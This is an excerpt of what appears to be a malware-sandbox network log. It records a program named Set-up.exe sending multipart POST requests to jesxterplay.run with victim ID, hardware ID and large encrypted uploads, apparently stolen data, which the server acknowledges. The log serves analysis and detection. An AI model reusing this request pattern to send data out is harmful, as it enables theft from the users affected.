2025-04-13 18:22:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49695	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:45 UTC	279	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=96GI6Kb2KhzYdU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 20537 Host: jesxterplay.run
2025-04-13 18:22:45 UTC	15331	OUT	Data Raw: 2d 2d 39 36 47 49 36 4b 62 32 4b 68 7a 59 64 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 39 36 47 49 36 4b 62 32 4b 68 7a 59 64 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 36 47 49 36 4b 62 32 4b 68 7a 59 64 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 Data Ascii: --96GI6Kb2KhzYdUContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--96GI6Kb2KhzYdUContent-Disposition: form-data; name="pid"3--96GI6Kb2KhzYdUContent-Disposition: form-data; name="hwid"EDE53E510CB8BD98DEE
2025-04-13 18:22:45 UTC	5206	OUT	Data Raw: 91 d5 2d 58 ec 4e ce 2f ea 65 89 34 d4 57 06 23 46 e4 96 c3 ae 66 fd af 53 c8 3f 2b a0 fb 51 5e ba eb 03 a3 e3 df f3 d0 e8 bb 28 c6 c9 cb 7c 17 de ca 78 22 da a3 13 ae cb 1e 1f c3 06 ee ec 59 40 18 ff 50 13 33 60 90 b7 69 fd ba e7 8b 23 b5 79 c4 f1 f4 70 ed 4f ec 52 3b 50 8a a4 f6 f0 e0 99 8a 3d 54 a3 b7 93 b6 a1 25 7a 0e f4 e3 b5 c9 61 f7 8c 93 35 3b ca c1 b4 26 ac 98 0c 2c 47 d9 a7 19 59 cc 35 b0 f1 d4 91 ff 27 9f d1 8f 38 fa 31 72 61 6c 22 3b 24 e0 83 0d e4 07 9d 65 6d d8 c9 28 c1 0d 2b 1f 54 0e b1 e7 1e 9b 32 f7 16 a4 ff 29 94 73 38 7e 18 f6 65 2f b0 3c 4c df 98 d6 c6 2f 66 53 3f 73 79 69 1a 4c 13 5a ad e8 7d d1 fd 28 b6 c7 66 e6 c8 41 84 eb 4c 0c 6d 90 b7 0a 98 6c f3 aa 60 14 e6 06 e2 b4 7e f1 87 4e 53 9b 26 f1 4a 48 b4 aa 96 b4 3c 4c 66 d1 30 d9 a1 Data Ascii: -XN/e4W#FfS?+Q^(\|x"Y@P3`i#ypOR;P=T%za5;&,GY5'81ral";$em(+T2)s8~e/<L/fS?syiLZ}(fALml`~NS&JH<Lf0
2025-04-13 18:22:46 UTC	822	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:45 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQsVG8Q3%2BFaH2jnygf65ophauPXvPUUWBM%2BZfJUbuuf2dv%2F2ouN8X6phe6biYEgw3ptqrM4Bsx%2BNLn%2Bu4L2t21mQ%2B4KkTh%2B%2Fgejkj3%2FClvx0kEvkiFW6pUqATJYeuzvjxgg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfd9e2e54e644-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=124936&min_rtt=124511&rtt_var=26691&sent=13&recv=23&lost=0&retrans=0&sent_bytes=3050&recv_bytes=21496&delivery_rate=32417&cwnd=252&unsent_bytes=0&cid=4c86bfbe7704eb08&ts=627&x=0"
2025-04-13 18:22:46 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 18:22:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49698	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:48 UTC	277	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=frxbM6K5Grh6W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 5439 Host: jesxterplay.run
2025-04-13 18:22:48 UTC	5439	OUT	Data Raw: 2d 2d 66 72 78 62 4d 36 4b 35 47 72 68 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 66 72 78 62 4d 36 4b 35 47 72 68 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 66 72 78 62 4d 36 4b 35 47 72 68 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 41 41 31 Data Ascii: --frxbM6K5Grh6WContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--frxbM6K5Grh6WContent-Disposition: form-data; name="pid"1--frxbM6K5Grh6WContent-Disposition: form-data; name="hwid"EDE53E510CB8BD98DEEAA1
2025-04-13 18:22:49 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:49 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oX4y5ay5w%2B6lErDkP%2FFbA53NYvGTD6WzndJpzHXR8Qg2%2B8qn1JyqEErFFYApR%2Bh59BOYyVFY0eO%2BZTl%2Bpi63rEKPSNhT84ysT90z0hoXvn%2FQL0wSKAhGJSk4QWHcl0IGCQY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfdb3080de9f3-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=120611&min_rtt=120593&rtt_var=25467&sent=7&recv=12&lost=0&retrans=0&sent_bytes=3048&recv_bytes=6352&delivery_rate=33465&cwnd=252&unsent_bytes=0&cid=cffa06241eacf357&ts=682&x=0"
2025-04-13 18:22:49 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 18:22:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49700	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:50 UTC	273	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=hnOW43SlY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 2495 Host: jesxterplay.run
2025-04-13 18:22:50 UTC	2495	OUT	Data Raw: 2d 2d 68 6e 4f 57 34 33 53 6c 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 68 6e 4f 57 34 33 53 6c 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 68 6e 4f 57 34 33 53 6c 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 41 41 31 46 37 41 45 34 35 42 33 30 46 0d 0a Data Ascii: --hnOW43SlYContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--hnOW43SlYContent-Disposition: form-data; name="pid"1--hnOW43SlYContent-Disposition: form-data; name="hwid"EDE53E510CB8BD98DEEAA1F7AE45B30F
2025-04-13 18:22:50 UTC	812	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:50 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yv%2BSOSzCPUmZzyyk7jOHO4PfFFhNiHFfn2zfqUU%2BHGuibY6IycpjCrxy5VYdTkpHyj7eiYRPwdhgFjyhqvxHnBewlNRJxktcycD7AiCBRy%2FG%2F%2Bk8dWZjpfdEjuNtnXdIM5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfdbcdb899934-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113204&min_rtt=112920&rtt_var=24256&sent=7&recv=10&lost=0&retrans=0&sent_bytes=3049&recv_bytes=3404&delivery_rate=35471&cwnd=252&unsent_bytes=0&cid=8445a9ac9ea3d4ac&ts=606&x=0"
2025-04-13 18:22:50 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 18:22:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49701	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:51 UTC	278	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=bth717d0f5df User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 575138 Host: jesxterplay.run
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 2d 2d 62 74 68 37 31 37 64 30 66 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 62 74 68 37 31 37 64 30 66 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 74 68 37 31 37 64 30 66 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 41 41 31 46 37 41 Data Ascii: --bth717d0f5dfContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--bth717d0f5dfContent-Disposition: form-data; name="pid"1--bth717d0f5dfContent-Disposition: form-data; name="hwid"EDE53E510CB8BD98DEEAA1F7A
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 75 01 fd ae 58 76 8f 43 de 0c c0 c5 b7 99 6e 67 9a e4 23 2b c4 88 97 19 57 21 e5 83 ae 23 0a a1 e6 68 86 25 b7 0d 01 11 4f 2e 16 39 ca 7c cd 40 9a 99 d9 75 0e af 6b 4e 1b d6 d5 19 b1 54 76 e1 ba 8e 08 e7 cf 7d 2e b5 44 ba d7 8b b8 ac 37 ad 2f 66 5e 5d ef d7 b4 96 ee 79 ba 1d cb 83 f7 ef b0 21 2f e5 18 ed c4 5a 2e 13 a1 1b 99 41 94 51 84 5b d7 d4 91 93 70 17 f3 05 d6 0e b3 19 36 39 89 af 9f 13 d4 2c f5 0c 64 c1 5f df 20 ab a1 57 49 3b 61 d9 1a cb 1d be c0 d4 3d 06 b9 de 14 2d ab 8c b0 78 32 84 d0 79 95 47 3f 84 94 32 d8 d7 49 7e 80 a3 70 e9 b9 3d 12 65 4b 8c ce d7 4a 71 39 f4 63 8a b1 f2 c0 57 3e af 59 68 0f 0f 9c a8 98 34 84 47 76 fd 99 c6 22 de c5 11 95 5d 92 27 69 32 f8 d9 af 31 85 52 b0 32 b9 2c 1e 33 ef 4f d1 12 d9 06 03 17 d3 1f cc c8 39 32 9d 02 b6 Data Ascii: uXvCng#+W!#h%O.9\|@ukNTv}.D7/f^]y!/Z.AQ[p69,d_ WI;a=-x2yG?2I~p=eKJq9cW>Yh4Gv"]'i21R2,3O92
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 44 0d 15 90 a5 65 1b f9 77 18 0b 25 67 ef 1b 59 3d d0 19 ea be c7 b2 2a 87 3a c4 5e e0 7d 66 ea 5e 6d 36 67 80 de d6 ef 7a 28 ce f8 40 35 6f 7d 16 f3 eb 80 79 d5 ec 4b ba df f0 ca ab cc 63 c9 1d 15 c6 3d be 05 d5 36 c0 3e 8e 77 3b cb 55 a8 b2 88 b0 03 cf b5 33 14 4b cc ed a9 06 bb bf 3f 06 bb cb 36 ae 1e d3 46 a9 3f b1 17 fc 5b 78 4d e9 40 6f ec 7f a3 05 ef 73 16 b2 59 8e f5 45 ac 44 57 4d 5c 43 3a 28 f7 26 d9 6b 9f 1c f0 c5 d9 ca 85 13 9a 19 94 7b 9e 12 9f 67 bf b2 5a 4a 90 bb 76 77 90 fe 98 12 59 76 4f e6 ca 0b 3b 42 c8 a5 e3 a6 9c 94 05 b8 bc 25 48 82 09 bc ec 98 af 81 18 2c bb f0 45 56 f8 29 c8 0f 8a ea 33 10 88 ae 06 ab f1 4b b2 6a 77 45 c8 ee 55 34 0d bd 76 62 7c d0 7d 04 79 00 56 2c d0 0e 9b 37 1a d7 7e d7 f3 89 da ba 33 b7 57 38 aa 75 af 1b f0 10 Data Ascii: Dew%gY=*:^}f^m6gz(@5o}yKc=6>w;U3K?6F?[xM@osYEDWM\C:(&k{gZJvwYvO;B%H,EV)3KjwEU4vb\|}yV,7~3W8u
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: c6 84 51 7b b3 81 47 96 34 9b 0c 1f e0 89 fe 6c c8 13 1d d3 51 8a 18 6f f4 91 f4 af e7 cd dc 52 bb 56 29 d7 e1 a9 49 72 7a c5 8f 94 05 5a a5 fd 74 c8 d8 a7 eb 33 ba e5 e6 2c cb c2 eb 36 ca 21 dc f4 7d 30 a9 fd 76 cc 4f ce ad 04 22 15 0c 9d 89 d4 60 b4 00 39 bf eb b8 91 b0 08 7c c6 f2 5d 89 e8 93 5c 5e 26 08 fe ff 48 c1 77 4e 4f d3 e6 e7 10 5a 5a db e6 dc b9 ff 8e 89 ae 89 ac 5f 6d 7d cc a0 3b d8 02 ed eb 78 87 8f 61 a6 bd f9 c5 43 97 87 4e ef 45 2a 74 3b 3e 9d f7 68 97 a8 2a cc 2a 1d 04 7b af 39 3c 96 9e 58 84 08 79 99 29 e2 23 2b 2f 29 81 5b 22 26 80 d5 38 f8 3a 07 e5 56 91 11 ca 28 85 48 d0 36 9d 4c 1c 37 25 3f f5 72 da 8c e8 66 84 05 28 8f 79 24 ca 1f df 2a ac 98 0b b0 61 bc fd c2 27 34 d0 7d 60 45 13 b6 c0 d1 8d 0e 92 21 39 ad 31 35 a1 1a 49 f9 96 38 Data Ascii: Q{G4lQoRV)IrzZt3,6!}0vO"`9\|]\^&HwNOZZ_m};xaCNEt;>h{9<Xy)#+/)["&8:V(H6L7%?rf(y$a'4}`E!915I8
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: c9 f3 bd b7 1b 1b 73 9d 9e 73 57 c1 9c 6a da a1 bf b4 ba e9 59 89 69 ac 36 42 78 c8 f8 01 77 30 44 cd 4a 52 a7 2f 0a 88 b1 58 b8 23 d5 a9 81 42 44 1f 6d 00 f5 b5 45 07 f2 97 b9 38 10 fa 40 e5 d5 1e cc 56 cf 23 1b e5 02 c3 ec 42 a7 37 a3 e8 73 67 0a c4 12 3f ea 28 9c 1f a4 3d a5 78 e9 81 f4 6f 07 60 bc df e9 17 c1 94 e1 9c 76 e4 e9 63 cf ba c5 2c 25 e2 ae 21 15 af b1 4a 85 fc c3 ab 48 0c 4e 2f a0 1f 9d f4 2d 92 8c 39 ba 4a 68 db 6c 36 ba d3 6d 7e 27 e2 c2 a3 5e 0f e2 c7 c3 7a 95 44 b5 02 27 e7 53 9a 75 be 61 73 78 96 a8 ed 08 88 37 1d ce 73 ec ec c9 c5 a3 d3 e2 11 bb c9 fc 43 a2 a4 55 3a 07 3c ca 60 de 69 7e 4e 32 77 19 0b 36 f1 79 ed fa 15 99 85 41 79 8a 62 d4 ae 13 3f ba 6f 00 ca 80 7b b4 b5 75 40 9b 25 fc 72 d3 32 bf c3 ef d8 42 26 8f 49 6b fa 1d 5c 3b Data Ascii: ssWjYi6Bxw0DJR/X#BDmE8@V#B7sg?(=xo`vc,%!JHN/-9Jhl6m~'^zD'Suasx7sCU:<`i~N2w6yAyb?o{u@%r2B&Ik\;
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 91 a8 fb ad 8b 49 e1 a9 2b 15 30 52 62 ad c5 a0 cd b8 1c dc d6 3f 7d cb 1d cc 44 06 eb a7 80 51 83 10 91 a5 c1 87 d7 d4 4d d8 bd 05 47 12 fa 3d 75 b2 60 0b 29 af 41 5b ae 19 f7 ca 92 d7 d1 20 49 1a db 14 b9 a2 38 c1 92 4a 20 ba 82 fc 4b 49 6b 44 e3 1b 95 52 72 ca e9 20 d3 69 2f 0b bf dc c3 89 07 cc 22 90 e8 31 51 f8 33 4a 5b 07 44 9e 70 aa 8d 5e 2d 72 d6 47 dc c5 30 54 97 dc b4 a3 28 ce 09 c0 9a b6 77 7d 1d 30 42 e7 a6 54 66 9d 48 66 d7 ec fe 40 7c b4 fe c9 5d 60 11 d9 eb 2a c3 7f fc ee cb 7f 39 be 06 ac 36 a6 5d c0 e5 84 ba ee 56 f5 53 4e 78 7d 26 4a 4c 06 ca d1 ef ae 9c 5e 99 62 d5 5e 0e 45 53 8a 99 b4 bd cc 71 df 1c 58 88 0f 52 f8 eb 5c 54 a0 79 7a a2 01 65 79 20 a5 56 01 05 2d 72 d4 21 21 9f cb 7b a1 7a 5f 94 2f 92 1a 12 9f 57 84 2e ff 35 f4 a5 3c 67 Data Ascii: I+0Rb?}DQMG=u`)A[ I8J KIkDRr i/"1Q3J[Dp^-rG0T(w}0BTfHf@\|]`*96]VSNx}&JL^b^ESqXR\Tyzey V-r!!{z_/W.5<g
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: c7 a6 89 19 78 49 2c d1 ad 71 7b 7a 74 74 b0 86 6c 06 e8 f0 df 91 3b a8 a5 db f3 cc ad ee f8 66 72 f3 01 9c b1 21 a4 0b 83 90 e0 d7 1b 37 83 61 d9 27 0f cd 29 7b 3d c3 0b 82 65 11 ec 72 82 85 bb e1 80 b1 f3 8d 2c be e0 a7 a1 60 1c 5e 5e 4a d6 54 b9 e6 0a d0 b9 2d 6f 10 0b 92 41 40 5d 8e 49 a5 be f0 1c ef ae 99 c4 db 55 5d f0 47 9e fc 6c 76 09 47 4b 33 9d e7 f9 52 63 ec 5a 06 50 51 4f 72 fb 6f 97 d2 16 fe ab b9 1e 76 e8 c3 76 f4 0f 3c 39 1c c6 1d fa 29 c9 32 cb 77 8e 42 18 16 70 f9 1d 4b 6b d4 85 bb 66 4d 69 0d 62 78 4e 86 d2 43 63 60 84 84 b3 3f 06 fa dc 6a 90 73 29 a6 b5 b4 c7 48 a8 05 e2 2c 48 b4 8a 7c 0a 03 b1 76 1e cc 89 29 2a 2f 0a 1c 65 3e ef 01 5c d9 a1 12 e5 4c 0f e5 ca a6 1f e3 ab 36 72 5f 0f 81 af 17 1c 64 d8 73 22 0d df 3b de b3 11 37 03 2b f2 Data Ascii: xI,q{zttl;fr!7a'){=er,`^^JT-oA@]IU]GlvGK3RcZPQOrovv<9)2wBpKkfMibxNCc`?js)H,H\|v)*/e>\L6r_ds";7+
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 40 1a 0c bc 42 09 6c 89 99 79 28 c2 a9 89 d0 d2 7e 27 d2 1c 67 77 f1 73 02 51 05 c6 ff 63 bf 63 7a 1b 17 33 bc e9 b0 01 34 2b 3c fe 95 44 0b d5 cb e8 0d d7 ec f0 54 da b6 8d 31 a4 ea 40 58 2d bb 19 b0 fa dd 37 0c a5 29 e9 56 02 04 e6 0b 6a 77 ed f7 50 3e 21 d5 40 f0 4c b2 7b fd 23 e2 ae ea e6 23 89 dc 3f e8 7f 8f 44 7f 9f 69 5b 5a 87 5a 88 3d d8 96 af 88 af 74 f8 c7 95 85 8b 6c 62 bf f8 1b 5f 3b ed 08 e9 1c 3e 99 1b 85 44 01 e3 aa 24 6b b9 a1 47 36 62 67 98 e1 cf d8 5f 33 ff 1d 18 c7 c5 de 23 ef 4d 95 32 75 fa c6 1a 2a c6 33 61 df 56 63 2f 2c de ae ef 3b 94 47 23 08 53 42 5b de 3a 79 a6 f3 22 9f d4 50 ed ae 0e 59 c9 fe 4b bc fd f9 91 76 ab 9a 38 0b 5c 84 dc 44 a3 96 2f 54 d5 6a 16 f1 b9 50 f0 fc 4c fd 91 0f e1 2c 76 13 5d e3 67 3d c5 d5 21 1f 56 ba 8a b5 Data Ascii: @Bly(~'gwsQccz34+<DT1@X-7)VjwP>!@L{##?Di[ZZ=tlb_;>D$kG6bg_3#M2u*3aVc/,;G#SB[:y"PYKv8\D/TjPL,v]g=!V
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 3d ff af d4 26 79 8d f8 e4 bb 8a cb db 9b ec cb 1f 6d 24 33 ba 19 6f dd 94 d5 7b 5b b4 60 8e d5 d0 d2 46 47 52 1a d2 d9 ae c1 71 4a 3e 49 6b dd 32 eb 00 e8 c3 55 79 32 1d 26 f3 10 b9 e1 8c 22 1b 22 ab 5a 15 ec e0 21 19 1a 93 c2 5f fd e3 55 8d a0 b2 22 f9 e6 bf 1f 9b 05 91 af 3c 63 ef 9f 50 f4 72 69 6d d6 da b2 55 3a ea 81 ce 2c ad 4d 1f 8c 54 39 12 bf 02 90 00 6b de 12 0a 1b bd 8d 8a 7a e0 18 fb 42 8e 54 bd 23 17 13 a3 2a 8b af 9e 68 ec ac 3e f6 94 31 68 11 cc 1f 68 43 0b dd ca 2f eb b5 1f cf ea a7 87 ab c5 79 1b 11 c7 ee 02 01 5f 2a 38 0f da 94 a4 59 6f f8 c5 c2 46 44 c6 ed ba c5 9d 2e 4d 8c 44 41 f0 e9 b3 84 fb 9c a9 f0 2b d4 4f bd 0a 91 e1 65 66 23 a7 ed dc 8f eb f2 f9 e3 02 d7 72 aa 19 e1 6c 15 3c 50 f3 fe 8f 1e 6c 9d c4 b6 c7 32 85 2e 57 1a 89 e9 e5 Data Ascii: =&ym$3o{[`FGRqJ>Ik2Uy2&""Z!_U"<cPrimU:,MT9kzBT#h>1hhC/y_8YoFD.MDA+Oef#rl<Pl2.W
2025-04-13 18:22:51 UTC	15331	OUT	Data Raw: 73 51 35 01 c7 be 85 92 9c 72 9a fd 99 b6 a1 20 c4 23 d0 6c 31 7b 51 b7 94 09 c4 f2 ce dd 40 3f 4a 27 e7 0e f2 be f3 6d 99 6b 7d 22 27 f4 04 20 04 5d d3 57 83 18 21 22 06 67 16 e8 9b 36 af 13 0a b6 53 fe d1 45 c9 05 50 1f 2e 77 94 8e 3e e7 88 10 6c 73 e0 11 6e 01 5b 94 a8 a1 a8 02 73 57 db 1e 96 5e 1a 1e 61 d9 55 a3 f7 d1 5e 5f 5b 56 12 a7 31 4c 36 a9 a3 00 f5 b4 5b de fb d7 17 da 2e ff bd db 87 74 34 21 94 ed fb 50 c1 11 b8 db 7f ce 13 6b cb 7e 56 64 a3 a6 46 a6 63 59 00 28 de 85 65 9a 31 fc 16 b4 59 f0 fe 87 3b 7c df 59 ee 3c 2a 7e a9 84 1a f3 3a d5 78 66 70 f0 3b 09 b8 13 f8 b2 89 3d 04 ca af 26 be 5e f0 c2 84 1e 74 e1 52 8c cc de 79 03 10 7c f6 32 9b 31 b4 24 b2 99 00 ec 6a 31 f1 72 e7 5b 3b 02 a0 8b 97 5c 16 52 93 f5 dc 9d 9a 41 d2 01 d1 31 a7 b8 c8 Data Ascii: sQ5r #l1{Q@?J'mk}"' ]W!"g6SEP.w>lsn[sW^aU^_[V1L6[.t4!Pk~VdFcY(e1Y;\|Y<*~:xfp;=&^tRy\|21$j1r[;\RA1
2025-04-13 18:22:53 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:53 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPijZ%2BYzlE6up6nRv35cIaJx457jGl4%2FeQ7UyZ9JqF7ZKWcXwmiEGMI89Q39OeY7W8Pg3I9kzbndQZ8hR7P54LiMfZBcnDXghfQbgtzCcHRb4T4jxhtyUqO%2FJrZew%2Byxfdw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfdc63fc7825d-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=121691&min_rtt=121598&rtt_var=25790&sent=265&recv=437&lost=0&retrans=0&sent_bytes=3050&recv_bytes=577680&delivery_rate=33129&cwnd=248&unsent_bytes=0&cid=a15c8acc813808cf&ts=1812&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49702	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
